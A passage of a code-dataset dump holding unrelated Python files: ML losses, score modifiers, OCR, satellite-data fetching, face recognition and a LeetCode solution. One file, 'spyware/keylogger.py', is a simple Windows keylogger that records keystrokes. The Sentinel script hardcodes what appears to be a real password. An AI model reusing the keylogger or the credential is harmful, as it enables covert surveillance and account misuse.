self.max_role_count):\n frame_loss += utils.cross_entropy_loss(role_label_pred[i][j], gt_labels[i,index,j] ,self.vocab_size)\n frame_loss = frame_loss/len(self.encoder.verb2_role_dict[self.encoder.verb_list[gt_verbs[i]]])\n #print('frame loss', frame_loss, 'verb loss', verb_loss)\n loss += frame_loss\n else:\n #verb from pre-trained\n loss = 0\n for i in range(batch_size):\n for index in range(gt_labels.size()[1]):\n frame_loss = 0\n #verb_loss = utils.cross_entropy_loss(verb_pred[i], gt_verbs[i])\n #frame_loss = criterion(role_label_pred[i], gt_labels[i,index])\n for j in range(0, self.max_role_count):\n frame_loss += utils.cross_entropy_loss(role_label_pred[i][j], gt_labels[i,index,j] ,self.vocab_size)\n frame_loss = frame_loss/len(self.encoder.verb2_role_dict[self.encoder.verb_list[gt_verbs[i]]])\n #print('frame loss', frame_loss, 'verb loss', verb_loss)\n loss += frame_loss\n\n\n final_loss = loss/batch_size\n #print('loss :', final_loss)\n return final_loss","sub_path":"model_roles_recqa_later.py","file_name":"model_roles_recqa_later.py","file_ext":"py","file_size_in_byte":9263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"496287644","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef raw(x: float, **kwargs):\n \"\"\"\n Dummy function to return raw values or 'as is'.\n :param x:\n :return:\n \"\"\"\n y = x\n return y\n\n\ndef norm(x: float, objective: str, max: float, min: float, **kwargs):\n \"\"\"\n\n :param x:\n :param objective:\n :param max:\n :param min:\n :param kwargs:\n :return:\n \"\"\"\n if objective == 'maximize':\n y = (x - min) / (max - min)\n\n elif objective == 'minimize':\n y = (x - max) / (min - max)\n\n else:\n print(\"Normalization objective must be either \\'minimize\\' or \\'maximize\\'\")\n raise\n\n return y\n\n\ndef lin_thresh(x: float, objective: str, lower: float, upper: float, buffer: float, **kwargs):\n \"\"\"\n\n :param x:\n :param objective:\n :param lower:\n :param upper:\n :param buffer:\n :param kwargs:\n :return:\n \"\"\"\n if objective == 'maximize':\n if x >= upper:\n y = 1.0\n elif x <= upper-buffer:\n y = 0.0\n else:\n y = (x - (upper-buffer)) / (upper - (upper-buffer))\n\n elif objective == 'minimize':\n if x <= lower:\n y = 1.0\n elif x >= lower+buffer:\n y = 0.0\n else:\n y = (x - (lower+buffer)) / (lower - (lower+buffer))\n\n elif objective == 'range':\n if lower <= x <= upper:\n y = 1.0\n else:\n if x <= lower-buffer:\n y = 0.0\n elif lower-buffer < x < lower:\n y = (x - (lower-buffer)) / (lower - (lower-buffer))\n elif x >= upper+buffer:\n y = 0.0\n else:\n y = (x - (upper+buffer)) / (upper - (upper+buffer))\n\n else:\n print(\"linThresh objective must be either \\'minimize\\' or \\'maximize\\' or \\'range\\'\")\n raise\n\n return y\n\n\ndef step(x: float, objective: str, lower: float, upper: float, **kwargs):\n if objective == 'maximize':\n if x >= upper:\n y = 1.0\n else:\n y = 0.0\n\n elif objective == 'minimize':\n if x <= lower:\n y = 1.0\n else:\n y = 0.0\n\n elif objective == 'range':\n if lower <= x <= upper:\n y = 1.0\n else:\n y = 0.0\n\n else:\n print(\"linThresh objective must be either \\'minimize\\' or \\'maximize\\' or \\'range\\'\")\n raise\n\n return y\n\n\ndef gauss(x: float, objective: str, mu: float, sigma: float, **kwargs):\n \"\"\"\n\n :param x:\n :param objective:\n :param mu:\n :param sigma:\n :param std:\n :param kwargs:\n :return:\n \"\"\"\n\n if objective == 'maximize':\n if x >= mu:\n y = 1.0\n else:\n y = np.exp(-0.5 * np.power((x - mu) 
/ sigma, 2.))\n elif objective == 'minimize':\n if x <= mu:\n y = 1.0\n else:\n y = np.exp(-0.5 * np.power((x - mu) / sigma, 2.))\n elif objective == 'range':\n y = np.exp(-0.5 * np.power((x - mu) / sigma, 2.))\n else:\n print(\"linThresh objective must be either \\'minimize\\' or \\'maximize\\' or \\'range\\'\")\n raise\n\n return y\n\n\ndef plot_mod(mod, func_kwargs: dict):\n X = np.linspace(0, 1, 101)\n Y = [mod(x, **func_kwargs) for x in X]\n plt.plot(X, Y, label=func_kwargs)\n plt.xlabel('x')\n plt.ylabel('modified x')\n plt.title(mod.__name__)\n plt.legend()\n plt.show()\n return\n\n\ndef plot_mod_objectives(mod, non_objective_kwargs: dict):\n objectives = ['maximize', 'minimize']\n if mod.__name__ != 'norm':\n objectives.append('range')\n\n X = np.linspace(0, 1, 101)\n\n fig, axes = plt.subplots(ncols=len(objectives), nrows=1, sharex=True, sharey=False, figsize=(6*len(objectives), 4))\n for objective, ax in zip(objectives, axes.flatten()):\n Y = [mod(x, objective=objective, **non_objective_kwargs) for x in X]\n ax.plot(X, Y, label=non_objective_kwargs)\n ax.set_xlabel('x')\n ax.set_ylabel('modified x')\n ax.set_title(objective)\n ax.legend()\n plt.suptitle(mod.__name__)\n plt.show()\n return\n","sub_path":"molscore/utils/score_modifiers.py","file_name":"score_modifiers.py","file_ext":"py","file_size_in_byte":4077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"393534628","text":"class Solution:\n def convert(self, s: str, numRows: int) -> str:\n if numRows ==1:\n return s\n ans = [\"\" for i in range(numRows)]\n i,flag=0,-1\n for v in s:\n ans[i] +=v\n if i==0 or i==numRows-1:#主要是遇到邊緣就是改變符號..\n flag = -flag\n i+=flag\n return ''.join(ans)\n\n\"\"\"\n6. Z 字形变换\n将一个给定字符串根据给定的行数,以从上往下、从左到右进行 Z 字形排列。\n\n比如输入字符串为 \"LEETCODEISHIRING\" 行数为 3 时,排列如下:\n\nL C I R\nE T O E S I I G\nE D H N\n之后,你的输出需要从左往右逐行读取,产生出一个新的字符串,比如:\"LCIRETOESIIGEDHN\"。\n\n请你实现这个将字符串进行指定行数变换的函数:\n\nstring convert(string s, int numRows);\n示例 1:\n\n输入: s = \"LEETCODEISHIRING\", numRows = 3\n输出: \"LCIRETOESIIGEDHN\"\n示例 2:\n\n输入: s = \"LEETCODEISHIRING\", numRows = 4\n输出: \"LDREOEIIECIHNTSG\"\n解释:\n\nL D R\nE O E I I\nE C I H N\nT S G\n\"\"\"\n","sub_path":"z字行按行排列.py","file_name":"z字行按行排列.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"567585380","text":"import io\nimport os\nimport io\nfrom google.cloud import vision\nfrom google.cloud.vision import types\nimport json\nfrom google.protobuf.json_format import MessageToJson\nfrom google.protobuf.json_format import MessageToDict\n\n# from .models import RawJson\n\n\nclass GoogleVisionApi:\n\n def __init__(self):\n #export GOOGLE_APPLICATION_CREDENTIALS=\"/Users/mtottrup/Desktop/BcLiqScanv1-6326a79539e7.json\"\n self.client = vision.ImageAnnotatorClient()\n\n\n def ocr_image(self, image_model):\n # file_name = os.path.join(\n # os.path.dirname(__file__),\n # 'resources/wakeupcat.jpg')\n\n # # Loads the image into memory\n # with io.open(file_name, 'rb') as image_file:\n # content = image_file.read()\n client = vision.ImageAnnotatorClient()\n content = image_model.binary.read()\n\n image = vision.types.Image(content=content)\n\n # Performs label detection on the image file\n response = client.text_detection(image=image)\n #texts = response.text_annotations\n texts = MessageToDict(response)\n #print('Texts:')\n # output = \"OCR Output:\"\n\n # for text in texts:\n # output += '\\n\"{}\"'.format(text.description)\n\n # 
vertices = (['({},{})'.format(vertex.x, vertex.y)\n # for vertex in text.bounding_poly.vertices])\n\n # output += 'bounds: {}'.format(','.join(vertices))\n\n # todo: Get the file name\n\n res_json = json.dumps(texts)\n\n # with open('jsons/name.txt', 'wb+') as destination:\n # destination.write(res_json)\n\n # import pdb; pdb.set_trace()\n\n # document.rawjson_set.create(\n # document = document,\n # name=\"Untitled\",\n # file=destination\n # )\n\n # document.save()\n\n\n #print(res_json)\n\n return res_json\n\n\n\n\n def label_image(self, document):\n\n # Instantiates a client\n client = vision.ImageAnnotatorClient()\n\n # The name of the image file to annotate\n content = document.image.file.read()\n\n # Loads the image into memory\n # with io.open(file_name, 'rb') as image_file:\n # content = image_file.read()\n\n image = types.Image(content=content)\n\n # Performs label detection on the image file\n response = client.label_detection(image=image)\n labels = response.label_annotations\n\n print('Labels:')\n for label in labels:\n print(label.description)\n\n\n\n# Imports the Google Cloud client library\n\n# Instantiates a client\n\n\n# The name of the image file to annotate\n","sub_path":"receipts/receiptreader/google_vision_api.py","file_name":"google_vision_api.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"416681336","text":"\n\n\nbytes = b'\\x18\\x00\\x03w\\xff\\xff\\x0099\\x05\\xff\\xff\\xff\\xff'\n# bytes = b'k\\xfa\\xff\\x12\\xdf\\xff\\x16\\xe1\\xff\\xd8\\xba\\xff\\xc5\\xe4\\xff\\xff\\xe7\\xffx\\xf1\\xff \\xd0\\xff\\xfd\\xcb\\xffU\\xb7\\xffl\\x93\\xff\\xc5\\x89\\xffzx\\xff\\xd8\\x83\\xff]\\x89\\xff\\x9e\\x96\\xff,\\xb5\\xffV\\xc4\\xff\\xbd\\xac\\xff\\x10\\x9f\\xffM\\xc5\\xff0\\xd7\\xff\\xad\\xce\\xff\\xd9\\xc1\\xff\\xf2\\x9e\\xff\\xfe\\xa4\\xff\\x00\\xa3\\xff\\xf9\\x9e\\xff\"\\x94\\xff:\\xa7\\xffg\\xa7\\xff\\xd4\\xaf\\xff\\xa1\\xb2'\n\ncadena = str(bytes)\ncadena = cadena.splitlines()\nprint(cadena)\nsalida = [];\nmovidita = cadena[0].split(\"'\")[1].split('\\\\')\nprint(movidita)\nmovidita.pop(0)\nfor lines in movidita:\n print(lines)\n binary = bin(int(lines[1:3],16))[2:] #Cogemos toda la trama sin x y sin otro valor\n print(binary)\n print(len(binary))\n i = 0\n sum = \"0\"\n if len(binary) != 8: # PARA EL FORMATO DE 8 BITS\n for i in range(int(len(binary)), 7):\n sum += \"0\"\n binary = sum + binary\n print(binary)\n else:\n print(binary)\n salida.append(binary)\n\nsalida = \"\".join(salida)\nprint(salida)\naudio = []\nfor i in salida:\n audio.append(int(i))\n\n\nprint(audio)\n","sub_path":"movidita.py","file_name":"movidita.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"650179374","text":"import fetchESA\nimport logging\n\n\n# --- set logging behaviour\nlogging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)\nlogging.info('Started')\n\nobj = fetchESA.sentinel()\n\n\n# --- set query authentification\nobj.query_auth('sebastien.valade', 'wave*worm')\n\n\n# --- set query options\n# 'filename'\n# 'platformname': Sentinel-1 | Sentinel-2\n# 'format': 'json'\n# 'polarisationmode'\n# 'productType'\n# 'aoi': (lat, lon) | (lon1, lat1, lon2, lat2)\noptns = {\n 'filename': 'S1A*',\n 'productType': 'SLC',\n 'maxrecords': 3}\n\n# --- query product\nproductlist = obj.product_search(optns, export_result=None)\n\n# print(productlist[0]['title'])\n# 
print(productlist[0]['uuid'])\n\n# --- download product\nobj.product_fetch(productlist)\n\nlogging.info('Finished')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"479733235","text":"#-*-coding: utf-8-*-\nfrom ctypes import *\nfrom sys import stdout\nfrom time import sleep\ngas = cdll.user32.GetAsyncKeyState\n\ndef main():\n\tfor i in range(0, 256):\n\t\ti = gas()\n\ttext = \"\"\n\twhile \"Z\" not in text:\n\t\tfor i in range(0, 255):\n\t\t\tif gas(i):\n\t\t\t\ttext += chr(i)\n\t\t\tsleep(0.0000000000001)\n\t\tstdout.flush()\n\tprint(text)\n\nif __name__ == '__main__':\n\tmain()\n\n","sub_path":"spyware/keylogger.py","file_name":"keylogger.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"152718301","text":"import visa\nfrom functions import cast, readBuffer, error_V, error_I\n\nclass smu2612b:\n \n def __init__(self, address):\n rm = visa.ResourceManager()\n equipment_id = 'GPIB0::' + str(address) + '::INSTR'\n \n self.smu = rm.open_resource(equipment_id)\n self.name = \"SMU2612B\"\n \n self.smu.write('smua.reset()')\n self.smu.write('smub.reset()')\n self.smu.write('reset()')\n \n self.smu.write('format.data = format.ASCII')\n \n # Buffer operations -------------------------------------------------------\n \n self.smu.write('smua.nvbuffer1.clear()')\n self.smu.write('smub.nvbuffer1.clear()')\n \n self.smu.write('smua.nvbuffer1.appendmode = 1')\n self.smu.write('smub.nvbuffer1.appendmode = 1')\n \n self.smu.write('smua.nvbuffer1.collectsourcevalues = 1')\n self.smu.write('smub.nvbuffer1.collectsourcevalues = 1')\n \n self.smu.write('smua.measure.count = 1')\n self.smu.write('smub.measure.count = 1')\n \n return\n \n def setup(self, config):\n \n [enable_a,\n source_a_cc,\n measure_a_cc,\n source_a_rang,\n measure_a_rang,\n source_a,\n measure_a,\n NPLC_a,\n delay_a,\n enable_b,\n source_b_cc,\n measure_b_cc,\n source_b_rang,\n measure_b_rang,\n source_b,\n measure_b,\n NPLC_b,\n delay_b] = config\n \n \n if enable_a == 1:\n if source_a == 'V' and measure_a == 'I':\n self.measure_a = 'I'\n \n # ------------------------------------------------------------------------- \n # smua configuration\n \n self.smu.write('smua.source.func = smua.OUTPUT_DCVOLTS')\n self.smu.write('smua.measure.func = smua.OUTPUT_DCAMPS')\n self.smu.write('display.smua.measure.func = display.MEASURE_DCAMPS')\n \n if (measure_a_rang == 'AUTO'):\n self.smu.write('smua.source.autorangei = smua.AUTORANGE_ON')\n else:\n self.smu.write('smua.source.rangei = ' + str(measure_a_rang))\n \n if (source_a_rang == 'AUTO'):\n self.smu.write('smua.measure.autorangev = smua.AUTORANGE_ON')\n else:\n self.smu.write('smua.measure.rangev = ' + str(source_a_rang))\n \n #compliance values for I and V\n self.smu.write('smua.source.limiti = ' + str(measure_a_cc))\n self.smu.write('smua.source.limitv = ' + str(source_a_cc))\n \t\n self.smu.write('smua.measure.nplc = ' + str(NPLC_a))\n self.smu.write('smua.measure.delay = ' + str(delay_a))\n \n else:\n print(\"source/measure quantity invalid.\")\n \n else:\n print(\"Channel a not enabled.\")\n\n \n if enable_b == 1:\n if source_b == 'I' and measure_b == 'V':\n self.measure_b = 'V'\n \n # ------------------------------------------------------------------------- \n # smua configuration\n \n self.smu.write('smub.source.func = smub.OUTPUT_DCAMPS')\n 
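# channel B sources DC current and measures DC voltage, mirroring the channel A setup above\n            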
self.smu.write('smub.measure.func = smub.OUTPUT_DCVOLTS')\n self.smu.write('display.smub.measure.func = display.MEASURE_DCVOLTS')\n \n if (measure_b_rang == 'AUTO'):\n self.smu.write('smub.source.autorangei = smub.AUTORANGE_ON')\n else:\n self.smu.write('smub.source.rangei = ' + str(measure_b_rang))\n \n if (source_b_rang == 'AUTO'):\n self.smu.write('smub.measure.autorangev = smub.AUTORANGE_ON')\n else:\n self.smu.write('smub.measure.rangev = ' + str(source_b_rang))\n \n #compliance values for I and V\n self.smu.write('smub.source.limiti = ' + str(measure_b_cc))\n self.smu.write('smub.source.limitv = ' + str(source_b_cc))\n \t\n self.smu.write('smub.measure.nplc = ' + str(NPLC_b))\n self.smu.write('smub.measure.delay = ' + str(delay_b))\n \n else:\n print(\"source/measure quantity invalid.\")\n \n else:\n print(\"Channel b not enabled.\")\n \n def measure(self, channel, option=True):\n if channel == 'a':\n measure_func = self.measure_a\n elif channel == 'b':\n measure_func = self.measure_b\n \n self.smu.write('smu%s.source.output = smu%s.OUTPUT_ON' % (str(channel), str(channel)))\n \n if measure_func == 'I':\n self.smu.write('smu%s.measure.i(smu%s.nvbuffer1)' % (str(channel), str(channel)))\n elif measure_func == 'V':\n self.smu.write('smu%s.measure.v(smu%s.nvbuffer1)' % (str(channel), str(channel)))\n else:\n print(\"Invalid SMU channel\")\n \n if option:\n self.smu.write('smu%s.source.output = smu%s.OUTPUT_OFF' % (str(channel), str(channel)))\n return\n\n\nclass smu2400:\n \n def __init__(self, address):\n rm = visa.ResourceManager()\n equipment_id = 'GPIB0::' + str(address) + '::INSTR'\n \n self.smu = rm.open_resource(equipment_id)\n self.name = \"SMU2400\"\n \n self.smu.write(\"*RST\")\n \n return\n \n \nclass Experiment:\n \n def __init__(self, v, instrument_setup, experiment_setup):\n self.instruments = []\n for i in range(len(v)):\n self.instruments.append(v)\n \n for i in range(len(self.instruments)):\n print(\"Instruments in experiment:\")\n print(\"%s. 
%s\" % (i, self.instruments[i].name))\n self.instruments[i].setup(instrument_setup[i])\n \n self.experiment_setup = experiment_setup\n return\n \n def iv_curve(self, channel):\n \n \"\"\"\n \n Function to perform iv curve with smu2612b\n \n \"\"\"\n [start, end, step] = self.experiment_setup\n output_flag = False\n \n if channel == 'a':\n source_func = self.instruments[0].measure_a\n elif channel == 'b':\n source_func = self.instruments[0].measure_b\n \n j = start\n while j <= end:\n if source_func == 'V':\n self.instruments[0].smu.write('smu%s.source.levelv = %s' % (str(channel), str(j)))\n elif source_func == 'I':\n self.instruments[0].smu.write('smu%s.source.leveli = %s' % (str(channel), str(j))) \n \n self.instruments[0].smu.measure(channel, output_flag)\n j += step\n \n if not output_flag:\n self.instruments[0].smu.write('smu%s.source.output = smu%s.OUTPUT_OFF' % (str(channel), str(channel)))\n \n readings_measure = cast(readBuffer(self.instruments[0].smu, str(channel))[1])\n readings_source = cast(readBuffer(self.instruments[0].smu, str(channel))[0])\n \n readings_source_error = error_V(readings_source, '2612')\n readings_measure_error = error_I(readings_measure, '2612')\n \n import matplotlib.pyplot as plt\n plt.errorbar(readings_source, readings_measure, \n xerr=readings_source_error, yerr=readings_measure_error, fmt='.')\n \n return [readings_source, readings_measure, readings_source_error, readings_measure_error]\n \n \n \n \n","sub_path":"Codigos/Codigo Labosat Clases/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":7812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"620389853","text":"\ndef gradiern_descent(square,room,price,alpha,theta0,theta1,theta2,max_iter):\n \"\"\"线性回归,梯度下降算法\n :param square: 训练集种的自变量\n :param room: 训练集种的自变量\n\t:param price: 训练集种的因变量\n\t:param theta0,theta1,theta2: 待求的权值\n\t:param alpha: 学习速率\n\t:param max_iter: 最大迭代次数\n \"\"\"\n\n deviation=1\n iter=0\n while deviation>0.0001 and iter maxy else maxy\n ty = np.min(y)\n miny = ty if ty < miny else miny\n plt.plot(np.log(x+1), y, color=self.color, alpha=alpha)\n # plt.plot(x, y, color=self.color, alpha=alpha)\n modif = self.set_tick_labels(ax, miny, maxy)\n plt.ylabel('Density'+modif)\n elif typ == 'se':\n alpha = np.min((1, 2.0/len(data)))\n for subj in data:\n x = np.linspace(1, len(data[subj]), len(data[subj]))\n y = data[subj]\n ty = np.max(y)\n maxy = ty if ty > maxy else maxy\n ty = np.min(y)\n miny = ty if ty < miny else miny\n plt.plot(x, y, color=self.color, alpha=alpha)\n modif = self.set_tick_labels(ax, miny, maxy)\n if tit is 'Spectrum':\n plt.ylabel('Eigenvalue'+modif)\n else:\n plt.ylabel('Portion of Total Variance')\n elif typ == 'sc':\n x = 0\n y = data.values()\n if len(y) <= 1:\n plt.scatter(0, y, color=self.color)\n plt.xlim([-0.5, 0.5])\n else:\n voil = plt.violinplot(y)\n voil['bodies'][0].set_color(self.color)\n plt.ylabel('Count')\n\n if typ == 'sc':\n plt.ylim([np.min(y)*0.9, np.max(y)*1.1])\n plt.xticks([])\n plt.yticks([np.min(y), np.max(y)])\n else:\n if typ == 'se':\n plt.xlim([np.min(x), np.max(x)])\n plt.xticks([np.min(x), np.max(x)])\n else:\n # plt.xlim([np.min(x), np.max(x)])\n # plt.xticks([np.min(x), np.max(x)])\n plt.xlim([np.min(np.log(x+1)), np.max(np.log(x+1))])\n plt.xticks([np.min(np.log(x+1)), np.max(np.log(x+1))])\n plt.ylim([miny, maxy])\n plt.yticks([miny, ((maxy - miny)/2), maxy])\n\n plt.title(tit, y=1.04)\n\n def rand_jitter(self, arr):\n stdev = .03*(max(arr)-min(arr)+2)\n 
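# jitter: Gaussian noise scaled to the data range; the +2 keeps the spread\n        # non-zero even when all values in arr are equal\n        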
return arr + np.random.randn(len(arr)) * stdev\n\n def factors(self, N):\n factors = [subitem for subitem in [(i, N//i)\n for i in range(1, int(N**0.5) + 1)\n if N % i == 0 and i > 1]]\n return set([fact for item in factors for fact in item])\n","sub_path":"ndmg/stats/plot_metrics.py","file_name":"plot_metrics.py","file_ext":"py","file_size_in_byte":7331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"402761174","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 28 15:16:22 2019\n\n@author: jack\n\"\"\"\n\nimport pandas as pd\nimport time\nimport pydotplus\nimport graphviz\n\nfrom sklearn import ensemble\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn import tree\n\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nwarnings.simplefilter(action='ignore', category=Warning)\ny2015 = pd.read_csv('local loan data.csv',nrows=5000)\n\ny2015 = y2015[:-2]\ny2015['id'] = pd.to_numeric(y2015['id'], errors='coerce')\ny2015['int_rate'] = pd.to_numeric(y2015['int_rate'].str.strip('%'), errors='coerce')\n\ny2015.drop(y2015.columns[[20, 95]], axis=1, inplace=True)\nX = y2015.drop('loan_status', 1)\nY = y2015['loan_status']\nX = pd.get_dummies(X)\nX = X.dropna(axis=1)\n\nstart = time.time()\nrfc = ensemble.RandomForestClassifier()\n\nensemble = cross_val_score(rfc, X, Y, cv=5)\nensemble_time = time.time() - start\n\n# Initialize and train our tree.\ntree_time = time.time()\ndecision_tree = tree.DecisionTreeClassifier(\n criterion='entropy',\n max_features=1,\n max_depth=7,\n)\nx=X\ny=Y\n#decision_tree.fit(customers, repeat_customer)\ndecision_tree.fit(x,y)\n\n# Render our tree.\ndot_data = tree.export_graphviz(\n decision_tree, out_file=None,\n feature_names=X.columns,\n filled=True\n)\n\nprint(\"Tree:\" )\nprint(cross_val_score(rfc, x, y, cv=5))\nprint(\"tree time = {:0.4f}\".format(time.time()-start))\n\nprint(\"Ensemble:\" )\nprint (ensemble)\nprint(\"ensemble time = {:0.4f}\".format(ensemble_time))\nprint(\"end\")\n","sub_path":"Random forest - guided example.py","file_name":"Random forest - guided example.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"421324217","text":"import time\nimport page_elements\nfrom datetime import datetime\nfrom logger_settings import ui_logger\nfrom scripts.crpo.event import event_excel\nfrom scripts.crpo.common import button_click\n\n\nclass CreateEvent(event_excel.EventExcelRead):\n def __init__(self):\n super(CreateEvent, self).__init__()\n\n now = datetime.now()\n self.event_date = now.strftime(\"%d/%m/%Y\")\n\n # --------------- Value initialization ----------------\n self.validation_check = ''\n self.get_event_name = []\n\n self.ui_create_event = ''\n self.event_validation_check = ''\n\n def create_event(self):\n try:\n self.event_tab()\n\n self.web_element_click_xpath(page_elements.buttons['create'])\n\n self.web_element_send_keys_xpath(page_elements.text_fields['text_field'].format(\"Name\"),\n self.event_sprint_version)\n\n time.sleep(4)\n self.web_element_send_keys_xpath(page_elements.text_fields['text_field'].format(\"Requirement\"),\n self.req_name_sprint_version)\n time.sleep(1.5)\n self.drop_down_selection()\n\n self.web_element_click_xpath(page_elements.event['job_field'])\n\n self.web_element_send_keys_xpath(page_elements.text_fields['text_field'].format(\"Search\"),\n self.job_name_sprint_version)\n\n 
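# move every job matched by the search into the selected list before confirming with Done\n            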
self.web_element_click_xpath(page_elements.multi_selection_box['moveAllItemsRight'])\n button_click.all_buttons(self, 'Done')\n\n self.web_element_send_keys_xpath(page_elements.text_fields['text_field'].format(\"Slot\"),\n self.xl_slot)\n self.drop_down_selection()\n\n self.web_element_send_keys_xpath(page_elements.text_fields['text_field'].format(\"From\"),\n self.event_date)\n\n self.web_element_send_keys_xpath(page_elements.text_fields['text_field'].format(\"To\"),\n self.event_date)\n\n self.web_element_send_keys_xpath(page_elements.text_fields['place_holder'].format(\"Reporting Date\"),\n self.event_date)\n\n self.web_element_send_keys_xpath(page_elements.text_fields['text_field'].format(\"Event Manager\"),\n self.xl_em)\n self.drop_down_selection()\n\n self.web_element_send_keys_xpath(page_elements.text_fields['text_field'].format(\"College\"),\n self.xl_college)\n self.drop_down_selection()\n\n self.web_element_click_xpath(page_elements.event['ec_enable'])\n\n self.driver.execute_script(\"window.scrollTo(0,100);\")\n button_click.button(self, 'Create')\n\n # ------------------------------- Validating event ---------------------------------------------------------\n self.driver.execute_script(\"window.scrollTo(0,-100);\")\n self.getby_details_screen(self.event_sprint_version)\n if self.header_name.strip() == self.event_sprint_version:\n print('**-------->>> Event Validated and continuing '\n 'with created event :: {}'.format(self.event_sprint_version))\n print('**-------->>> Event created successfully')\n self.ui_create_event = 'Pass'\n self.event_validation_check = 'Pass'\n else:\n print('Failed to create event <<<--------**')\n print('Event validation failed Or event creation failed <<<--------**')\n\n except Exception as error:\n ui_logger.error(error)\n","sub_path":"scripts/crpo/event/create_event.py","file_name":"create_event.py","file_ext":"py","file_size_in_byte":3785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"166556936","text":"from flask import g\nfrom plynx.db.demo_user_manager import DemoUserManager\nfrom plynx.web.common import app, requires_auth, make_fail_response\nfrom plynx.utils.common import JSONEncoder\n\n\ndemo_user_manager = DemoUserManager()\n\n\n@app.route('/plynx/api/v0/token', strict_slashes=False)\n@requires_auth\ndef get_auth_token():\n access_token = g.user.generate_access_token()\n refresh_token = g.user.generate_refresh_token()\n return JSONEncoder().encode({\n 'access_token': access_token.decode('ascii'),\n 'refresh_token': refresh_token.decode('ascii')\n })\n\n\n@app.route('/plynx/api/v0/demo', methods=['POST'])\ndef post_demo_user():\n user = demo_user_manager.create_demo_user()\n if not user:\n return make_fail_response('Failed to create demo user')\n demo_user_manager.create_demo_graphs(user)\n\n access_token = user.generate_access_token(expiration=1800)\n return JSONEncoder().encode({\n 'access_token': access_token.decode('ascii'),\n 'refresh_token': 'Not assigned',\n 'username': user.username\n })\n","sub_path":"plynx/web/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"378190506","text":"import pickle\nfrom sklearn.tree import DecisionTreeClassifier\n\n\nif __name__ == \"__main__\":\n with open(\"dataset.pickle\", \"rb\") as f:\n data = pickle.load(f)\n\n features_train = data[0]\n tags_train = data[1]\n features_test = data[2]\n tags_test = data[3]\n # print 
(features_test.shape, tags_test.shape)\n\n neigh = DecisionTreeClassifier()\n neigh.fit(features_train, tags_train)\n pred = neigh.predict(features_test)\n # print(pred, tags_train)\n pred = list(pred)\n tags_test = list(tags_test)\n # print(\"prediction: \", pred[:])\n # print(\"test tags: \", tags_test[:])\n mae = 0\n for i in range(len(pred)):\n mae += abs(pred[i] - tags_test[i])\n print(\"DT MAE: \", float(mae) / len(pred))\n\n","sub_path":"artifacts/Clara/MS_scale_out/baselines/train_dt.py","file_name":"train_dt.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"152012250","text":"import face_alignment\nimport cv2,os\nimport numpy as np\nfrom configs import configs\nfrom faced import FaceDetector\nfrom faced.utils import annotate_image\nfrom training.insight_face import InsightFace\nfrom training.utils_alignment import execute_alignment\nfrom training.utils_insightface import get_embedding\nimport tensorflow as tf\n\n\n\n\nframe_interval=3\ndef webcam_face_recognizer(database):\n \"\"\"\n Runs a loop that extracts images from the computer's webcam and determines whether or not\n it contains the face of a person in our database.\n\n If it contains a face, an audio message will be played welcoming the user.\n If not, the program will process the next frame from the webcam\n \"\"\"\n\n cv2.namedWindow(\"preview\")\n vc = cv2.VideoCapture(0)\n face_descriptor = InsightFace(model_fp=configs.face_descriptors_model_fp, \n input_tensor_names=configs.face_descriptors_input_names,\n output_tensor_names=configs.face_descriptors_output_names,\n device=configs.face_descriptors_device)\n \n face_alignment_predictor = face_alignment.FaceAlignment(face_alignment.LandmarksType._2D,flip_input=False)\n face_detector = FaceDetector()\n c=0\n while vc.isOpened():\n _, frame = vc.read()\n rgb_img = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n \n timeF = frame_interval\n if(c==0):\n bboxes = face_detector.predict(rgb_img)\n frame = process_frame(bboxes, frame, face_descriptor, face_alignment_predictor) \n ann_img = annotate_image(frame, bboxes)\n c=(c+1)%timeF\n key = cv2.waitKey(100)\n cv2.imshow(\"preview\", ann_img)\n\n if key == 27: # exit on ESC\n break\n cv2.destroyWindow(\"preview\")\n\ndef process_frame(bboxes, frame, face_descriptor,face_alignment_predictor):\n \"\"\"\n Determine whether the current frame contains the faces of people from our database\n \"\"\"\n \n for (x, y, w, h, prob) in bboxes:\n x1 = int(x - w/2)\n y1 = int(y - h/2)\n x2 = int(x + w/2)\n y2 = int(y + h/2)\n identity = find_identity(frame, x1, y1, x2, y2,face_descriptor,face_alignment_predictor)\n # Draw a label with a name below the face\n cv2.rectangle(frame, (x1, y2), (x2, y2+30), (0, 255, 0), cv2.FILLED)\n font = cv2.FONT_HERSHEY_DUPLEX\n cv2.putText(frame, identity, (x1 + 6, y2 + 18), font, 1.0, (255, 255, 255), 1)\n\n return frame\n\ndef find_identity(frame, x1, y1, x2, 